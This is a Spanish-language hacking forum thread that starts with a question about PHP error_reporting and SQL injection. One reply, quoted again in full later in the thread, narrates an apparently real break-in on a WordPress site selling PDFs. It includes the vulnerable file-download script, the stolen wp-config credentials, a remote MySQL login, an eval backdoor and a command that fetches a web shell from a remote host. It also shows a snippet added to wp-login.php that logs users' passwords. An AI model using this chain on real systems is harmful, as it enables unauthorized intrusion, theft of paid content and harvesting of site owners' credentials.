elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  duda sobre error_reporting y SQLi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda sobre error_reporting y SQLi  (Leído 3,568 veces)
Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
duda sobre error_reporting y SQLi
« en: 21 Agosto 2012, 02:52 am »

hola

tengo una duda, estaba leyendo que para evitar los mensajes de error se puede utilizar

error_reporting()

pero tambien lei que esta forma solo tapa los mensajes de error, pero no arregla los fallos

alguien tiene informacion sobre si se puede de alguna manera ver si la pagina es vulnerable?
En línea

.                                 
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #1 en: 21 Agosto 2012, 15:18 pm »

Código:
[code]
Un error de PHP no indica que una web es vulnerable, pero si se provoca el error de forma concierte puede indicar que la web es vulnerable como en el caso de SQLI. Pero en lo personal, la peor forma de buscar vulnerabilidades es a partir de provocaciones de error, porque simplemente no sabe lo que hace.

La mejor formar, es saber qué por si solo un código PHP no se vulnera/explota así mismo, el problema viene cuando el sistema necesita utilizar información dada por el usuario, entonce hay que verificar hacia donde va la información, en que parte se utilizas y cuando conozcas hacia donde va y como utiliza la información, y sepas como funciona todo, tendrás que pensar en alguna forma de manipular la información, de forma que realice una acción que desees.

Para esto no vale que sepas SQLI, LFI, RFI, XSS o hagas una lista de todas las vulnerabilidades que conoces y la vayas descartando cada una. Aqui vale la logica y mientra mejor sea tu nivel de programación, mas rápido detectaras errores lógicos que puedas aprovecharte y vale mucho los trucos que sepas.


Por ejemplo, hace como 1 mes estaba navegando por internet, buscando un tipo de información especifica (nada de programación, hacking ni nada similar, algo personal), encontré una pagina muy buena, que vendía un material en PDF. Me puse a navegar, a ver si encuentro el archivo por hay y nada. Entonce opte por ingresar a su servidor y bajarme el archivo PDF directamente.

La web estaba en wordpress. Revisando los post, encontré un post que hacia una descarga directa a un archivo que tenia de muestra, este archivo tenia un parámetro, que se utilizaba para descargar un archivo especifico y bueno, le quite el parametro de forma que quede el archivo solo: web.com/archivo.php y me hizo una descarga directa al archivo.php y bueno este es el codigo del archivo.php.

Código
  1. <?php
  2.    $f = $_GET["f"];
  3.    header("Content-type: application/octet-stream");
  4.    header("Content-Disposition: attachment; filename=\"$f\"\n");
  5.    $fp=fopen("$f", "r");
  6.    fpassthru($fp);
  7. ?>

Como el sistema que utilizaba era wordpress, descarge el archivo wp-config.php con la idea de conectarme remotamente por MYSQL, recordando que el archivo.php, se encontraba en la raiz del servidor y el archivo wp-config.php tambien se encuentra en la raiz, solo debi pasar el parámetro del archivo wp-config.php

web.com/archivo.php?f=wp-config.php

Descarge el archivo wp-config.php
Código
  1. // ** Ajustes de MySQL. Solicita estos datos a tu proveedor de alojamiento web. ** //
  2. /** El nombre de tu base de datos de WordPress */
  3. define('DB_NAME', 'wp_sys');
  4.  
  5. /** Tu nombre de usuario de MySQL */
  6. define('DB_USER', 'user_bd');
  7.  
  8. /** Tu contraseña de MySQL */
  9. define('DB_PASSWORD', 'MysqlPass');
  10.  
  11. /** Host de MySQL (es muy probable que no necesites cambiarlo) */
  12. define('DB_HOST', 'localhost');
  13.  

Luego me conecte de forma remota a la base de datos MYSQL, primero que nada le hice un ping a la web para conocer su IP para así pasarle el parámetro.

Código
  1. yoya@Debian:~$ mysql -h 182.94.110.121 --user=user_bd --password=MysqlPass
  2. Welcome TO the MySQL monitor.  Commands END WITH ; OR \g.
  3. Your MySQL connection id IS 1125935
  4. Server version: 5.1.38-log SOURCE distribution
  5.  
  6. Copyright (c) 2000, 2011, Oracle AND/OR its affiliates. ALL rights reserved.
  7.  
  8. Oracle IS a registered trademark OF Oracle Corporation AND/OR its
  9. affiliates. Other names may be trademarks OF their respective
  10. owners.
  11.  
  12. TYPE 'help;' OR '\h' FOR help. TYPE '\c' TO clear the CURRENT INPUT statement.
  13.  
  14. mysql> USE wp_sys;
  15. DATABASE changed
  16. mysql> SHOW TABLES;
  17. +-----------------------+
  18. | Tables_in_wp_sys      |
  19. +-----------------------+
  20. | wp_commentmeta        |
  21. | wp_comments           |
  22. | wp_links              |
  23. | wp_options            |
  24. | wp_postmeta           |
  25. | wp_posts              |
  26. | wp_snews_members      |
  27. | wp_term_relationships |
  28. | wp_term_taxonomy      |
  29. | wp_terms              |
  30. | wp_usermeta           |
  31. | wp_users              |
  32. +-----------------------+
  33. 12 ROWS IN SET (0.18 sec)
  34.  
  35. mysql>

Bueno luego cambie la password del admin, por el mio para poder entrar a la administración y subir shell. Recordando que wordpress, utiliza phpass, el password que utilice debe ser un password phpass para que funcione.

Lo cambie y todo, entre al sistema de administración de WordPress, me fui al lado de los plugins y había un editor de archivo y le agregue esta linea
Código
  1. <?php eval($_GET['e']); ?>
.

Y bueno ahora subi la SHELL.

Código
  1. web.com/wp-plugin/pluginNAME/file.php?e=file_put_contents('shell.php',file_get_contents('http://www.example.com/shell.txt'));

Y bueno ahora solo queda ir a la dirección de la SHELL que seria:

Código:
web.com/wp-plugin/pluginNAME/shell.php

Y bueno ya tenia la shell en el servidor, pero me fije que el archivo no se encontraba en ese servidor sino en otro que tenia, en ese otro servidor tenia otros documentos para vender, y el otro servidor usa WordPress y de casualidad tiene el mismo archivo de descarga en el mismo lugar.

Hice lo mismo paso de arriba pero con la diferencia, en que no me permite la conexión MYSQL remotamente.

Luego se me ocurrió probar entrar a la administración con el mismo pass que utiliza el administrador en su primera web (en la que pude subir shell), y bueno se me ocurrió capturar su password en texto plano, así no tengo que descifrar sus el hash generado por phpass y ahorrarme muchísimo tiempo.

Agregue esta linea al archivo wp-login.php
Código
  1. <?php
  2. if(!empty($_POST['wp-submit']) && !empty($_POST['log']) && !empty($_POST['pwd'])) {
  3.  
  4.    if($_POST['wp-submit'] == 'Acceder') {
  5.  
  6.    $f = fopen('wp.txt',"a");
  7.     fputs($f, $_POST['log'].':'.$_POST['pwd']."\n");
  8.  
  9.    fclose($f);
  10. }}
  11. ?>

Cada vez que alguien intente loguearse, capturare su usuario y password y creare un archivo wp.txt con su user y pass, para luego revisarlo, la estructura del archivo wp.txt es la siguiente:

Código:
user:pass
Anonww:wwxDDF

He hecho unos testeo haber si todo marcha a la perfeccion y si, todo va bien pero todavia no he capturado su usuario y pass pero el ha posteado varias veces. Supongo que es porque la primera vez que se logueo le dio a recordar y por eso no ha tenido que ingresar su usuario y password, o puede ser que al introducir datos correctos, no llegue a pasar por esa linea de codigo y por lo tanto nunca llega a guardar su usuario y password. Luego tendre que hacer unas pruebas, haber porque solo me captura el usuario y password cuando me intento loguear con datos incorrecto.

Saludos.

fxf
« Última modificación: 21 Agosto 2012, 16:16 pm por ~ Yoya ~ » En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
afdlkglfgfdgfhgf

Desconectado Desconectado

Mensajes: 92


Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #2 en: 22 Agosto 2012, 00:59 am »

Código:
[code]
Un error de PHP no indica que una web es vulnerable, pero si se provoca el error de forma concierte puede indicar que la web es vulnerable como en el caso de SQLI. Pero en lo personal, la peor forma de buscar vulnerabilidades es a partir de provocaciones de error, porque simplemente no sabe lo que hace.

La mejor formar, es saber qué por si solo un código PHP no se vulnera/explota así mismo, el problema viene cuando el sistema necesita utilizar información dada por el usuario, entonce hay que verificar hacia donde va la información, en que parte se utilizas y cuando conozcas hacia donde va y como utiliza la información, y sepas como funciona todo, tendrás que pensar en alguna forma de manipular la información, de forma que realice una acción que desees.

Para esto no vale que sepas SQLI, LFI, RFI, XSS o hagas una lista de todas las vulnerabilidades que conoces y la vayas descartando cada una. Aqui vale la logica y mientra mejor sea tu nivel de programación, mas rápido detectaras errores lógicos que puedas aprovecharte y vale mucho los trucos que sepas.


Por ejemplo, hace como 1 mes estaba navegando por internet, buscando un tipo de información especifica (nada de programación, hacking ni nada similar, algo personal), encontré una pagina muy buena, que vendía un material en PDF. Me puse a navegar, a ver si encuentro el archivo por hay y nada. Entonce opte por ingresar a su servidor y bajarme el archivo PDF directamente.

La web estaba en wordpress. Revisando los post, encontré un post que hacia una descarga directa a un archivo que tenia de muestra, este archivo tenia un parámetro, que se utilizaba para descargar un archivo especifico y bueno, le quite el parametro de forma que quede el archivo solo: web.com/archivo.php y me hizo una descarga directa al archivo.php y bueno este es el codigo del archivo.php.

Código
  1. <?php
  2.    $f = $_GET["f"];
  3.    header("Content-type: application/octet-stream");
  4.    header("Content-Disposition: attachment; filename=\"$f\"\n");
  5.    $fp=fopen("$f", "r");
  6.    fpassthru($fp);
  7. ?>

Como el sistema que utilizaba era wordpress, descarge el archivo wp-config.php con la idea de conectarme remotamente por MYSQL, recordando que el archivo.php, se encontraba en la raiz del servidor y el archivo wp-config.php tambien se encuentra en la raiz, solo debi pasar el parámetro del archivo wp-config.php

web.com/archivo.php?f=wp-config.php

Descarge el archivo wp-config.php
Código
  1. // ** Ajustes de MySQL. Solicita estos datos a tu proveedor de alojamiento web. ** //
  2. /** El nombre de tu base de datos de WordPress */
  3. define('DB_NAME', 'wp_sys');
  4.  
  5. /** Tu nombre de usuario de MySQL */
  6. define('DB_USER', 'user_bd');
  7.  
  8. /** Tu contraseña de MySQL */
  9. define('DB_PASSWORD', 'MysqlPass');
  10.  
  11. /** Host de MySQL (es muy probable que no necesites cambiarlo) */
  12. define('DB_HOST', 'localhost');
  13.  

Luego me conecte de forma remota a la base de datos MYSQL, primero que nada le hice un ping a la web para conocer su IP para así pasarle el parámetro.

Código
  1. yoya@Debian:~$ mysql -h 182.94.110.121 --user=user_bd --password=MysqlPass
  2. Welcome TO the MySQL monitor.  Commands END WITH ; OR \g.
  3. Your MySQL connection id IS 1125935
  4. Server version: 5.1.38-log SOURCE distribution
  5.  
  6. Copyright (c) 2000, 2011, Oracle AND/OR its affiliates. ALL rights reserved.
  7.  
  8. Oracle IS a registered trademark OF Oracle Corporation AND/OR its
  9. affiliates. Other names may be trademarks OF their respective
  10. owners.
  11.  
  12. TYPE 'help;' OR '\h' FOR help. TYPE '\c' TO clear the CURRENT INPUT statement.
  13.  
  14. mysql> USE wp_sys;
  15. DATABASE changed
  16. mysql> SHOW TABLES;
  17. +-----------------------+
  18. | Tables_in_wp_sys      |
  19. +-----------------------+
  20. | wp_commentmeta        |
  21. | wp_comments           |
  22. | wp_links              |
  23. | wp_options            |
  24. | wp_postmeta           |
  25. | wp_posts              |
  26. | wp_snews_members      |
  27. | wp_term_relationships |
  28. | wp_term_taxonomy      |
  29. | wp_terms              |
  30. | wp_usermeta           |
  31. | wp_users              |
  32. +-----------------------+
  33. 12 ROWS IN SET (0.18 sec)
  34.  
  35. mysql>

Bueno luego cambie la password del admin, por el mio para poder entrar a la administración y subir shell. Recordando que wordpress, utiliza phpass, el password que utilice debe ser un password phpass para que funcione.

Lo cambie y todo, entre al sistema de administración de WordPress, me fui al lado de los plugins y había un editor de archivo y le agregue esta linea
Código
  1. <?php eval($_GET['e']); ?>
.

Y bueno ahora subi la SHELL.

Código
  1. web.com/wp-plugin/pluginNAME/file.php?e=file_put_contents('shell.php',file_get_contents('http://www.example.com/shell.txt'));

Y bueno ahora solo queda ir a la dirección de la SHELL que seria:

Código:
web.com/wp-plugin/pluginNAME/shell.php

Y bueno ya tenia la shell en el servidor, pero me fije que el archivo no se encontraba en ese servidor sino en otro que tenia, en ese otro servidor tenia otros documentos para vender, y el otro servidor usa WordPress y de casualidad tiene el mismo archivo de descarga en el mismo lugar.

Hice lo mismo paso de arriba pero con la diferencia, en que no me permite la conexión MYSQL remotamente.

Luego se me ocurrió probar entrar a la administración con el mismo pass que utiliza el administrador en su primera web (en la que pude subir shell), y bueno se me ocurrió capturar su password en texto plano, así no tengo que descifrar sus el hash generado por phpass y ahorrarme muchísimo tiempo.

Agregue esta linea al archivo wp-login.php
Código
  1. <?php
  2. if(!empty($_POST['wp-submit']) && !empty($_POST['log']) && !empty($_POST['pwd'])) {
  3.  
  4.    if($_POST['wp-submit'] == 'Acceder') {
  5.  
  6.    $f = fopen('wp.txt',"a");
  7.     fputs($f, $_POST['log'].':'.$_POST['pwd']."\n");
  8.  
  9.    fclose($f);
  10. }}
  11. ?>

Cada vez que alguien intente loguearse, capturare su usuario y password y creare un archivo wp.txt con su user y pass, para luego revisarlo, la estructura del archivo wp.txt es la siguiente:

Código:
user:pass
Anonww:wwxDDF

He hecho unos testeo haber si todo marcha a la perfeccion y si, todo va bien pero todavia no he capturado su usuario y pass pero el ha posteado varias veces. Supongo que es porque la primera vez que se logueo le dio a recordar y por eso no ha tenido que ingresar su usuario y password, o puede ser que al introducir datos correctos, no llegue a pasar por esa linea de codigo y por lo tanto nunca llega a guardar su usuario y password. Luego tendre que hacer unas pruebas, haber porque solo me captura el usuario y password cuando me intento loguear con datos incorrecto.

Saludos.

fxf

una de las fases antes de realizar un PENTEST es recolectar información tanto por FOOTPRINTING o FINGERPRINT, y provocar un error muchas veces suele dar datos muy jugosos como un PATH, sqli basadas en errores,IP's,version del servidor etc.. , claro está que evitando estos en muchos casos no conseguiras mitigar ataques pero creo que es una buena forma de hacer las cosas. ;)

por cierto hay muchos ataques que se basan en errores, tanto de programacion como de configuracion del servidor.

En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #3 en: 22 Agosto 2012, 01:31 am »

una de las fases antes de realizar un PENTEST es recolectar información tanto por FOOTPRINTING o FINGERPRINT, y provocar un error muchas veces suele dar datos muy jugosos como un PATH, sqli basadas en errores,IP's,version del servidor etc.. , claro está que evitando estos en muchos casos no conseguiras mitigar ataques pero creo que es una buena forma de hacer las cosas. ;)

por cierto hay muchos ataques que se basan en errores, tanto de programacion como de configuracion del servidor.



Claro hay muchísimos ataques que se basan en errores, pero estas hablando en general, en este caso nos referimos a errores de programación a nivel web y mayormente los errores que se provocan al nivel web son errores de sintaxis, las otra parte de errores son bug's en algunas funciones que hacen que provoquen error.

En este tema abarca, lenguajes que se ejecutan al lado del cliente como javascript y los del lado del servidor PHP, Python, Perl, Java, etc... Porque si atacamos a los servicios que corren en un servidor ya es otro tema esa.

Si estas buscando vulnerabilidades en un CMS de PHP, como por ejemplo SMF y comienzas a tratar de provocar errores para poder encontrar vulnerabilidades, vas MUY MAL.

Recordando claro que en este tema se hablo sobre error_reporting que es una función de PHP y de SQLI, así que el tema circula sobre PHP.

Saludos.
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #4 en: 22 Agosto 2012, 04:13 am »

OK muchas gracias por las respuestas
En línea

.                                 
afdlkglfgfdgfhgf

Desconectado Desconectado

Mensajes: 92


Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #5 en: 22 Agosto 2012, 04:25 am »

Claro hay muchísimos ataques que se basan en errores, pero estas hablando en general, en este caso nos referimos a errores de programación a nivel web y mayormente los errores que se provocan al nivel web son errores de sintaxis, las otra parte de errores son bug's en algunas funciones que hacen que provoquen error.

En este tema abarca, lenguajes que se ejecutan al lado del cliente como javascript y los del lado del servidor PHP, Python, Perl, Java, etc... Porque si atacamos a los servicios que corren en un servidor ya es otro tema esa.

Si estas buscando vulnerabilidades en un CMS de PHP, como por ejemplo SMF y comienzas a tratar de provocar errores para poder encontrar vulnerabilidades, vas MUY MAL.

Recordando claro que en este tema se hablo sobre error_reporting que es una función de PHP y de SQLI, así que el tema circula sobre PHP.

Saludos.

entonces que pinta la lamerada que describiste, sacaste de contexto la pregunta, para describir un super 'CUACKeo' .

por cierto quien dice que algo esta bien o mal ??, seria logico tratar de ingresar 100 veces como ROOT
a un DBMSMYSQL con la misma contraseña ??, hay muchas cosas que te podria nombrar que pinta para mal, pero al fin  al cabo termina por buen camino ;) .

como dices la pregunta va por la función error_reporting , y creo que es totalmente recomendable tener control absoluto de todos los errores, SEA LO QUE SEA.

  :D
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #6 en: 22 Agosto 2012, 14:27 pm »

LOL
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
afdlkglfgfdgfhgf

Desconectado Desconectado

Mensajes: 92


Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #7 en: 23 Agosto 2012, 00:30 am »

cuando no hay argumentos,no queda de otra  :rolleyes:
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #8 en: 23 Agosto 2012, 00:58 am »

así es.
« Última modificación: 23 Agosto 2012, 01:06 am por ~ Yoya ~ » En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
int_0x40


Desconectado Desconectado

Mensajes: 300


Ver Perfil
Re: duda sobre error_reporting y SQLi
« Respuesta #9 en: 25 Agosto 2012, 19:40 pm »

Dejando lamereadas de lado (no se por qué me acuerdo de IRC y unos "compañeros" de cierto canal), en mi opinión seguramente existen muchas ocasiones en que un 'how to do' no se apega a los cánones del footprinting de un curso CEH y es necesario ir más allá para comprender totalmente la lógica que siguió el desarrollador de la webapp y así descubrir fallas que no necesariamente se descubrirían por las vías más comunes como serían los errores clásicos que arroje una aplicación, DBMS o servidor. No digo que esto último no sirva, sólo que no siempre muestra todo lo que se puede encontrar si nos metemos de lleno en el código.

Saludos.
En línea

"The girl i love...she got long black wavy hair ”
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda en Blind SQLi
Nivel Web
tragantras 4 2,539 Último mensaje 9 Marzo 2010, 14:48 pm
por tragantras
GiE 4.8 - SQLi
Nivel Web
Pony-Magic 4 5,871 Último mensaje 17 Diciembre 2010, 14:37 pm
por xassiz~
Duda Sqli
Seguridad
kiorochi 0 1,091 Último mensaje 12 Noviembre 2013, 18:27 pm
por kiorochi
Duda sobre cómo explotar esta vulnerabilidad (SQLi)
Nivel Web
SonrisaCs 2 1,915 Último mensaje 20 Febrero 2015, 16:44 pm
por pablox_co
Habilitar error_reporting en Apache2 (Ubuntu 12.04)
Desarrollo Web
[u]nsigned 5 2,373 Último mensaje 21 Junio 2015, 18:54 pm
por MinusFour
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines